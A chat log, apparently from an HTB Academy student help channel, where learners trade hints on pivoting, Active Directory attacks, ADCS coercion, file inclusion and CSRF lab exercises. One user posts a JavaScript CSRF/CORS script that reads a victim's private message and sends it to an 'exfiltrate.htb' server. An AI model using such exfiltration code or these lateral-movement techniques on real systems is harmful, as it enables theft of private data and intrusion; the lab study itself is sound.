I am on the Pivoting Module Skill assessment and I already compromised the windows host through the webserver. I noticed that there is another subnet and performed a pingsweep, but I am unable to perform an nmap scan to this nerwork. I am unsure on how to make this double pivot to my attack host. Can anyone help me on this?

Ty in advance!!

HTTP ATTACKS - TE.CL

Could someone give me explanation, what wrong i do?

hmmmm

can't get ouput what i need

"Obtaining the KRBTGT Account's NT Hash using Mimikatz", "Attacking Domain Trusts - Child -> Parent Trusts - from Windows"

hello amigos. I hope everybody is having an amazing Friday - weekend almost here. I have a minor question of the SSRF module at the blind SSRF question. This time we require to only encode our python web shell 2 times rather than 3 times which was the case in the SSRF example. The server structure to my knowedge is the same as the SSRF example. Why do we encode only 2 times this time?

wat user r u

htb-student

i just copy pasted

.

is it a domain user?
The getncchanges error means ur user doesn’t have replication rights
User must be local admin on DC or a domain admin

so using mimikatz by admin access help this , right?

let me try thi

it worked, 👍👍

guys I cant understand why every lab am trying to solve seems buggy on htb
Enumerate the MySQL server and determine the version in use. (Format: MySQL X.X.XX)
Am trying to solve this lab, and even used "sudo nmap <ip> -sC -sV -p3306 --script mysql*" to know the version
But it doesnt show me the version

help!!

If you think you have issues with the labs, did you try to reach out to support to verify that

yes i did messaged but still no reply!
What should I do?

There are troubleshooting tips on https://help.hackthebox.com/ related to the VPN

already done still no reply

INCIDENT HANDLING PROCESS During an investigation, we discovered a malicious file with an MD5 hash value of ‘b40f6b2c167239519fcfb2028ab2524a’. How do we usually call such a hash value in investigations? Answer format: Abbreviation

IOC ABBREVATION IS ANSWER BUT ANSWER IS NOT ACCEPTING

anyone help me

IOC should be accepted

I got the credential for svc_sql using kerberoasting, what is the best method to get the ip of this user so that i can login with evil-winrm

no its showing error ,i typed answer :indicators of compromise

Could someone help me with this? @muted kindle

what to do stuck

netexec

did the switching routes work?

help me guys please

ioc

I don't know since I don't know the IP address of the final host.

My attempts at a ping sweep either result in a ton of hosts or nothing.

I tried a configuration of 172.16.5.0/24 for ligolo and 172.16.6.0/24 for ligolo2 as well.

My current issue lies with host discovery.

I've tried the ping sweep commands from the module along with some Nmap scans, but no solid result.

worked , thank you so much

I was able to discover the first pivot host with ping sweep, after running it twice, didn't catch it the first time.

so u have changed sessions to the second agent and started --tun ligolo2?
Then the nmap -sn the network address of the new interface should pick something out ?

Alright, I'll give the nmap -sn command a go again, last time it returned a bunch of hosts.

I have the " Target(s) are spawning..." for 10 minutes now - is there anything i can do besides, terminate, refresh and/or restart ?

whenever i boot up HTB it will just say Target(s) are spawning...

me too !! I can't get access to the machine, it is always spawwning

I've been having the same issue since yesterday, I just keep refreshing, try to spawn the target, and if that doesn't work, then refresh and try again.

alright, thanks for the feedback

how will netexec give the ip

are you trying to find which box it can login to?

no, i got the svc_sql user's password using kerbroasting and i want to login to this user, but i dont know the ip

how to get find the ip of this user

@muted kindle which routes should I add this time?

172.16.0.0/16 ligolo
172.16.6.0/24 ligolo2

or

172.16.5.0/24 ligolo
172.16.6.0/24 ligolo2

i'm not understanding something here
IP isn't tied to a user it's by machines
You need to check it against a list of IP to see which one it can login to

u ifconfig the agent
its IP and subnet mask
determine its network address, thats the route to add

These are the IP addresses I have, and if I follow what you said, it won't allow me to add a second route.

So if I've already added the route 172.16.0.0/24 on the tun ligolo, it won't allow me to add the same route on tun ligolo2.

are these all in the same subnet ?

Yeah, since the mask is 255.255.0.0 /16, they're in the same subnet, no? Cuz the network address will be 172.16.0.0 for both then?

hmm since theres no new subnet then theres no new routes

Yeah, so what would you suggest I do? Should I change the first route to be 172.16.5.0/24 and make the second route 172.16.6.0/24 or 172.16.0.0/16?

Side note: I've tried performing a ping sweep directly from pivot 2's CMD, but that gave no results.

Sorry cant see the module so idk what its trying to get you to do
But if pc1 and pc2 in same subnet, pc2 has no new network interface, an agent is only needed on pc1
so there is only one route 172.../16 through ligolo

Basically, it's trying to get me to double pivot. Pc2 (or pivot2) does have a new interface (IP address in the diagram).

it's strange because they all fall under the same network

Does the module want you to use other tools?

I spoke with Xre0uS about this yesterday and he said the reason I prolly have to pivot is cuz of other things that may be segmenting the network.

Yeah, it does, but I'm tryna do it with ligolo.

Well, it's skills assessment so it hasn't mentioned which tools to use, but I assume they expect me to use tools from the module.

iv'e no idea how to work with this then because if you add 2 routes it might get confused which interface a packet goes to because both aare same networks
Perhaps ask him again later

Alrighty, thanks.

U still need help with ttht? you removed the message

Ahh, was having issues, had to delete the message and then it got sent.

Discord being a little whacky, but yeah, I still need help with the host discovery.

Hi can I dm you? I am fighting with the same monster D:

Yeah, sure.

try having only one route
then nmap -sn 172.16.0.0/16 but thats gonna take a while
unless u write a bash command to ping with only 1 packet

Alrighty, I'll give it a go.

When u tried doing it from inside pivot2 u scann the 172.16.6.1 - 172.16.6.254 ?

Yes

@muted kindle I just checked Xre0uS's ligolo tutorial that I've been learning from, it seems to be a similar situation in the tutorial. He changed the /16 to /24 so he did 172.16.5.0/24 on dev ligolo and 172.16.6.0/24 on ligolo2. I'll give that a go and let you know.

why can I not swtich vpn servers 💀

tbh I usually just use /24 for the ip routes

at least for htb modules you can assume it's always /24

Oh. You got any idea about how to deal with the situation I'm having rn? ^

if it's irl check with their networking guy

I'm now anxious about the kind of situation I'm having now showing up on the exam 😂

just set it to /24

Still the same after refreshing?

It confuses me too for the /16 🥴

I'm doing it now, here's praying ping sweep works from pivot2

it should be able to reach in theory but you don't really know whats behind the scenes

just be able to adapt ig, if something doesn't work, swtich things around and use the things that do

yep

What about if you spawn it from a different module?

Btw does ligolo get messed up if I change the routing table after I've already started a tunnel, shouldn't right?

remove the old one, it will take precedence

Done 👍

@next bronze @muted kindle I followed what Xre0uS said and added the routes. When I run the ping sweep tho, I get a TON of output 💀

can't say that I've had that happen to me before

yeh ligolo never showed me that
go to the pivot2 run the ping sweep from it again

Funnily enough tho, when I run it from the CMD on pivot2, I only get a few ping replies, from the hosts .25, .35, and .45

for /L %i in (1 1 254) do ping 172.16.6.%i -n 1 -w 100 | find "Reply"

I'd probably restart the proxy and agents

Like reconnect everything? I've done it already before, this is prolly my third time? It's always the same output 😂

Module: ADCS attacks
Section: Skills assessment

To get initial access to DEV01, I tried to use ESC8 but the coerce failed (using coercer or petitpotam.py). Can someone give me a hint? thanks

yeah then I'm not sure, never seen this before

I'm gonna be so dead on the CPTS exam when it comes to host discovery 🤣

don't use ping

What other options I got? ARP ping?

scan select ports with nmap

Oh, like top 10 ports you mean for the entire subnet?

sudo nmap --top-ports=10 172.16.0.0/16

So something like that ^ ?

10 might be too few, I just use -F

that scans the top 100

And use the -Pn as well, right?

if u do that for a /16

😬

yeah do /24

So by doing that I'm basically making an assumption that the host will be on that part of the subnet, yeah?

Since the second interface has the X.X.6.X

And what about this? It's needed, right?

Tbh I use it in all my scans. It's supposed to disable ICMP echo iirc.

yes to both

Alrighty, thanks.

So the command would be like this?

sudo nmap -F -Pn -n 172.16.6.0/24

yeah that should work

Best I first run the ping sweep from the actual host itself tho, then I'll resort to this command.

Thanks for your help, both of you.

oops forgot to reply to you here, try another esc and coercer should work, make sure you gave it the credentials

I tried ESC11 but I still don't get any hits on my certipy listener.....

what are you targeting

I'm trying to compromise dev01

did you try multiple endpoints with coercer

yes I keep getting RPC_S_ACCESS_DENIED in the coercer output

Hu

Hi

is it possible that the DC was patched and I can no longer coercer it?

are you trying to target the dc or dev01?

the DC, let me try dev01

if you can esc11 the dc right away then what are the other questions for

hi everyone
I'm stuck with this question " Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer." about the ORACLE TNS module.

Check the server is up/you are connected to VPN/Its the correct IP

thx

y0 y0 amigos. I found the answer to my own question. This time it is just internal server and local host thus 2 times html encoding. But i though that the internal server was only accessible through the first server. Anyways is something around these lines hahahah

Hey folks i'm prepping for the cpts and i'm going back to the modules for a revision, if i re-do the all of the skill assement with no issues i should be well revisioned for the cpts right? Or should i re-do all of the exercises too?

Do the skill assesment cover everything or should i go back to the exercises?

it says 1 indicates 'remote server' and '0' indicates linked server, so are these two linked server? isnt a linked server supposed to be remote, im confused

Hey guys I'm currently doing the Windows Privilege Escalation module and there is a question "What executable other than cmd.exe is blocked by AppLocker? " and I can't seem to find the solution to this question

A remote server is not the same as a linked server. Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.

This means that a linked server could just be another database server instance running on the same machine.

what about a remote server? is it another database server instance that can be accessed remotely?

Accessed remotely, I'm not 100% sure about this tho.

why does the query retrieve a remote server?

The query actually retrieves the contents of the table sysservers which I'm assuming contains remote and linked servers.

oh right, isremote and srvname tables

No, they're column names.

right, *columns

what is a transact sql statement

It's Microsoft's extension to SQL.

oh okay, thank you :))

Hi im working on the windows fundementals module and I cant seem to rdp into the box

i am connected to the vpn and see the box on a scan

any ideas?

What is the error

it just says cant connect i sent you a screenshoot

Ur pic is so large my phone is struggling to load it dam

lol sry

trying to csrf, but cookies are not attached to the request why

what module and section

CORS Misconfigurations in advanced csrf and xss

the code provided in the module worked for me

fetch doesnt work?

your code isn't doing anything with the fetch first of all

second i don't know programming well enough to know if all the works together, i know what the module provided worked

your code misses a lot, like exporting the data somewhere, using javascript base64 encoding, etc

try using the code in the module you may have better luck

you need to exfiltrate to the exfiltration server

i was testing locally

In 'Active Subdomain Enumeration' the last question was "Submit the number of all "A" records from all zones as the answer."

I got the answer by manually checking and counting them, was there a way to do this with a tool that I am not aware of or is this the intended method ?

This is intended, I believe however, that dig tells you how many records were retrieved

Or you can do some regex filtering and pass it to wc -l

<!DOCTYPE html>
<html>
<body>
<script>
fetch("https://vulnerablesite.htb:51154/profile.php", {
  credentials: 'include'
})
.then(res => res.text())
.then(text => {
    const parser = new DOMParser();
    const doc = parser.parseFromString(text, 'text/html');
    const element = doc.getElementById('private-message');
    window.location = 'https://exfiltrate.htb:51154/?data=' + btoa(element.innerHTML)
})
.catch(err => console.error('Error:', err));
</script>
</body>
</html>

will this script work for csrf

the module used xml request, i wanna try fetch

Why not try it and see

Yeah it does, I just subtracted the non A records from the result.
;; XFR size: [redacted] records (messages 1, bytes 594)

Playing with Regex is beyond my skill/knowledge atm.

Regex is a basic thing shown in the Linux Fundamentals module

grep -e "\sA\s" try passing your dig through this

Thanks will check that out, I did all my Linux stuff on THM and that wasn't covered iirc

If it's not -e it's -E

it somehow worked on remote and doesnt work locally

maybe because of browser difference

Nah it works, still need to add them up manually but this will be good to know if I need to filter out a huge list at some point. Thanks !

There's a math function (which is bash scripting) {{ $(command 1) + $(command 2) }}

I can pipe it into wc -l and it works, Very cool!

Is there a way to see responses to your posts in erratum? Mine seem to disappear 👀 (I have one open but am missing a few)

Heyy :)), I'm on the Getting Started module of the Penetration Tester Path, on the Public Exploits part, and I am having troubles finding the right exploit to utilize on the target at the end, I did my enumeration and found an exploitable apache server and a Wordpress plugin (which also seems exploitable), but after trying some exploits I can't seem to find one that fits, what can I do to help me choose the right exploit?

You have to do something else before being able to use an exploit (at least for the route I took)

Hmmm okok

ty for the help :))

If that's too subtle (it kind of is) -> some exploits don't work when you're ||unauthenticated||

i am doing Skills Assessment - File Inclusion. now i know %00 works and "../../" can be detected and url encode doesn't work . any hints ?

mmmmmmm I seee, I ran into that in some of them

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/7e4a38a1a5897a86f727341f90b199cc02ff0053/Directory Traversal ?

I thought that this initial machines would be done only using mostly things learned on that part, but that makes a lot more sense, ty once again :))

Yes it's kind of surprising but a lot of HTB content requires to go further than just applying what you learned (in comparison to tryhackme for example)

Yeah, I've only done a few machines in tryhackme that's why i was used to more linear machines, but this is way better imo

I have a question regarding Using Metasploit Framework Module, section Session & Jobs, last question. After exploiting the vulnerability with metasploit, I tried to the manual exploit too for practice. But no matter what I did I could not get it to work. It seems that it only works if you compile the C exploit on the target itself. But question is if I dont have gcc, does that meant manual exploitation is out of the way with metasploit being the only option ?

If a mod closes it/sets to read only they "disappear"

The right exploit is one that lets you read sometimes

Oh btw, I realised the Public Exploits part is an other exercise (but keep in mind what I said for later), in that case you can do it unauthenticated. In that case I'm a bit surprised that you're struggling because it's straightforward:

• when you go on the home page, the first thing you can read is "Plugin Simple Backup 2.7.10 for Wordpress"
• if you use exploit-db.com or searchsploit, you'll only have one result when searching for WordPress Plugin Simple Backup (you don't even have to search for a specific version)

Bruhhh ahahaha, it didn't even occorred to me that that could be an exploit 💀 , I should've researched that, tyty

I've got it know ahaha, tyty

It's that simple

Often you need to log in as an administrator to see plug-ins but since this is a getting started thing, it's not that deep

So the idea is that this types of plug-ins are hidden in a way, or they need authentication to be accessed?

Well no

It's that plug-ins are managed by web admins usually

You're not often gonna see the plugin version in your face

Usually because threat actors can use versions as a way to find exploits

I seee, so the key in this exercise was the plugin part, the fact that it was a plugin of WordPress isn't important, nor was the version of the WordPress?

Probably just worth noting that in the future modules you will do, that when you need to answer question you will already have covered the method to obtain the answer.
But you might need to use the info that you learned in a different way.

That makes sense, ty very much for the explanations

Okay 👌

damm academy just got a lot better

https://tenor.com/view/always-has-been-among-us-astronaut-space-betrayal-gif-23836476

what happened?

Then today I learned that I took an alternative path for the ||last exercise of the getting started path||
What I did was ||crawling the files on the server, finding one with the user hash, cracking the hash (the password is very weak), login with the user credentials, uploading a webshell||
When the intended path only needed|| the right exploit and a valid username||

Both valid

No, usually you can compile the code on another system that closely resembles the one you’re trying to exploit (same distribution, version, version of libc,…) and transfer the binary.
You can always look at the metasploit code for the module to check how they do it 😉

for some reason powershell is giving me this error when I try to transfer a file. I just got back to doing HTB Academy today for first time in a while and I'm sure my head is hazy. Is there something I'm not understanding from the module? This is for Windows File Transfers section of File Transfers module.

For the Shells & Payloads, the exercise in the Payloads section indicates to set the smb share variable SHARE to ADMIN$, however that variable is not present in the msf module. I cannot run the exploit.
It seems like the smbversion for pwnbox is casuing an issue though.

you mean translating the code to another language that is available on the target system ? btw I tried compiling it on my machien as I said but it does not work when transffered

no, just compiling using the same or similar gcc version from another machine

apologies if I don't quite get it. Compile locally then transfer it ?

yes, with the same or similar gcc version

yeah tried that it gave back some missing library error

yes, hence the point with the same or similar gcc version

hmmm, not something I considered, so I should somehow find out what version of gcc they used in the github poc

and downgrade/upgrade to the same version

then compile it

no, so you find out what glibc version are available on the target, then use the right gcc to compile it

you can't really downgrade it, that's why the originlal suggestion was to use "another system that closely resembles the one you’re trying to exploit"

ok so these would be the steps ?

1.find out available glib version on the target
2.set up a VM with the same glib version and compile the C exploit there
3.transfer the exploit to the target

are you using the right exploit?

correct, generally older versions will be compatible with new versions but not the other way around

alright, thanks a bunch for the help

feels like there should be a dedicated module for this C stuff too

yes its the windows smbexec exploit. Its weird. The specific error is :

peer_native_os is only available with SMB1 (current version: SMB3)

Im hung up on this right now trying to work out why it isn't working properly, its just supposed to be following through the module but I have this unexpected issue.

check the exploit you're using

have you tried to reboot msfconsole or your VM ? sometimes that does the trick for me when metasploit throws up errors

Thanks lol wow I was going deep into it I for real overlooked to use psexec instead of webexec

I was about to run the exploit manually cause I thought the config within msf was wrong lol

do all of that before triple checking im using the right exploit smh lol. thanks though I appreciate it

Look at the exploit names, yours is different from theirs

Thanks Marcie, I got it figured out ^. *Facepalm

Anyone have any actionable advice on feeling overwhelmed at how much information the whole PTJR path has? Like note taking/report writing guidance? It just seems like it's so much, and I'm not even halfway through. Specifically in preparation for the CPTS exam.

PTJR?

Penetration Tester Job Role.

Just say pentester path or cpts path

chunk your workload into digestable segments

guys does cpts path provide some staff that can be put on linkedin (apart from cpts cert)

no

no grind it all within 30 hours and forget everything

I try, but I have a tendency to make things unnecessarily difficult. I'm using obisidian, and make an effort to name the "digestable sections" based on their target environment context. It mostly works, but I'm almost through AD Attacks & Enum, and my face feels like it's melting.

take your time with it, AD is a huge topic and a lot of things can be overwhelming at first

you'll get better as time goes on and you practice more

Thanks for the encouragement. I also lack patience with myself, so taking my time takes effort. I've been thinking about splitting sessions between the modules and relevant boxes on the main platform. All while documenting and even writing actual reports once that module is done.
However, I feel like I don't have time to take. I'm not getting any younger, and however talented and disciplined I may be, it's seems like such a tall mountain, with a dozen or so false summits.

You're implementing walls where ladders exist

Sure it's a tall mountain, but you tackle it a time

You're not expected to be an expert at the end

Just competent

The exam itself tests two things: your ability to do the work, and your understanding of the domain

That seems to be a common theme in my life. My coming to you all for advice is in direct confrontation of that element of my brain. The two words "Just competent" and your following message actually do feel like the chill pill I needed.

In other words, "Noob needs a chill pill."

You're trying to achieve perfection when a later module might trivialize the basics

Thank you for that! I've self-witnessed it in the modules. I see how it builds and drives you to performing steps that call on prior modules and how prior modules seem trivial as the concepts get more towards targeting a whole network.

They are building blocks

https://tenor.com/view/jin-ghost-of-tsushima-jinsakai-gif-26781351

there's also no one way/thing to do get there right away, field field is all about constantly learning and improving

Field field

👹

Sup all? Starting the modules over, this time taking notes on every module page. Any1 that has tips on how to take notes or organizing them? Curious to see how other do it

Hi, in the "Footprinting SNMP" module on the "Pentester" path, could anyone please help me understand how it's best to approach the last question? I understand that I need to use snmpwalk in conjunction with grep to locate the script in the wall of text that is snmpwalk's output, but I'm not really sure how to approach this as I have no idea what that script might be called. I'm looking to better understand how to approach these scenarios as opposed to someone just flat out giving me the answer if possible.

Hey, I'm taking notes on everything in the modules - from techniques, to tools used, to generic explanations. Feel free to DM me if you want to check out what I've done with regards to note-taking.